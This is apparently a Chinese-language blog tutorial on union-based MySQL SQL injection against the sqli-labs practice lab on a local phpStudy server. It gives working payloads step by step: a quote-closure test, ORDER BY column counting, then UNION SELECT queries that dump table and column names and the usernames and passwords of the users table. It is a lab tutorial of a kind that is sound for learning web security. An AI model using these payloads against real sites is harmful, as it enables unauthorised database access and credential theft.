mysql注入联合查询

环境搭建

下载复现漏洞的包

下载小皮面板

将下载好的文件解压在小皮面板的phpstudy_pro\WWW路径下

将这个文件phpstudy_pro\WWW\sqli-labs-php7-master\sql-connections\db-creds.inc

中的密码更改为小皮面板中的密码

选择php版本

在小皮中启动nginx和数据库

使用环回地址访问

先判断是什么类型的注入

使用id=2-1和id=1,如果两者结果相同则为字符型否则为数字类

id=1后面加'或"查看报错

使用后发现返回值为mysql的报错

使用id=' --+

发现结果和id=1一致说明我们第一次使用 ' 时使mysql语句中多了个 ' 第二次使用--+说明输入的单引号与前面的id=1形成了一个闭合,因此可以判断注入类型为字符型,闭合方式为单引号

我们要对字段数进行判断

id=1' order by 1 --+ 可以使用二分大法

找到准确的列数后可以用union进行查询了,比如列数是3

id=1' union select 1,2,3 limit 1,1 --+ 或者

id=-1' union select 1,2,3 --+
联合查询的输出是严格按照顺序进行的,因此当id=1存在时会在第0行输出第一个sql语句查询到的结果,输入的数字就到了下一行 而 limit 1,2的作用为从第num1行开始显示num2行内容

我们可以看到2,3被输出了,说明这两个位置都可以作为回显点

也可以不用limit语句,只需让前面sql语句查询结果为空

然后就可以开始爆库名了

id=-1' union select 1,database(),3 --+

database()显示当前库名称 也可以使用group_concat() 将所有内容写入一行并输出

爆表名

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

查找数据库中security库下的所有表名

payload:information_schema是mysql自带的库,记录了该数据库所有的表名和字段名

显然users十分关键

看字段名

id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

查询数据库security下表users中的所有字段

同理username与password看起来非常重要

进去看看

id=-1' union select 1,group_concat(username,0x3a,password),3 from security.users --+

查询security库中users表中字段username与password的所有信息

0x3a为16进制 意思是 ' :'

相关推荐
yexuhgu6 分钟前
Redis如何解决哨兵通知延迟问题_优化客户端连接池动态刷新拓扑的订阅监听机制
jvm·数据库·python
洛水水7 分钟前
Redis 协议与异步通信深度解析
数据库·redis·缓存
S1998_1997111609•X11 小时前
论当今社会主义与人文关怀人格思想下的恶意仿生注入污染蜜罐描述进行函数值非法侵入爬虫的咼忄乂癿〇仺⺋.
数据库·网络协议·百度·ssh·开闭原则
倔强的石头_12 小时前
kingbase备份与恢复实战(六)—— 备份自动化与保留策略:Windows任务计划+日志追溯
数据库
轻刀快马13 小时前
别被 ORM 框架宠坏了:从一场“订单消失”悬案,看懂 MySQL 为什么要强推 InnoDB
数据库·mysql
后端漫漫14 小时前
Redis 客户端工具体系
数据库·redis·缓存
PaperData15 小时前
1988-2025年《中国人口和就业统计年鉴》全年份excel+PDF
数据库·人工智能·数据分析·经管
星河耀银海16 小时前
C语言与数据库交互:SQLite实战与数据持久化
c语言·数据库·sqlite·交互
过期动态16 小时前
MySQL中的约束
android·java·数据库·spring boot·mysql
程序员陆通16 小时前
月烧 400 刀到不到 20 刀:我是怎么把 OpenClaw 的 Token 账单砍掉 95% 的
java·前端·数据库